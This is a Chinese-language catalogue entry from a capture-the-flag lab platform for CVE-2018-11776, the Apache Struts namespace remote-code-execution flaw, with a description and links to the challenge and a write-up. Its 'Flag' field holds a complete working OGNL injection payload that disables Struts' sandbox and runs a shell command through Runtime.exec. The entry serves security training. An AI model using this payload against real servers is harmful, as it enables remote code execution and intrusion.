CVE-2018-11776
| ID: | 14736 |
|---|---|
| 标题: | CVE-2018-11776 |
| 描述: | Apache Struts 版本 2.3 到 2.3.34 和 2.5 到 2.5.16 当 alwaysSelectFullNamespace 为真(由用户或像 Convention Plugin 之类的插件)时可能会遭受远程代码执行,然后:结果在没有命名空间的情况下使用,同时,它的上层包没有或通配符命名空间,与结果相似,使用没有值和操作集的 url 标签时的可能性相同,同时,其上层包没有或通配符命名空间。 |
| 类型: | WEB |
| 网站: | 春秋云境 |
| 题目链接: | https://yunjing.ichunqiu.com/cvevip |
| 赛事: | 春秋云境 |
| 年度: | None |
| Flag值: | ${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream()))).(#w.close())}/index.action |
| writeup: | https://www.anquanke.com/post/id/157823%E3%80%82 |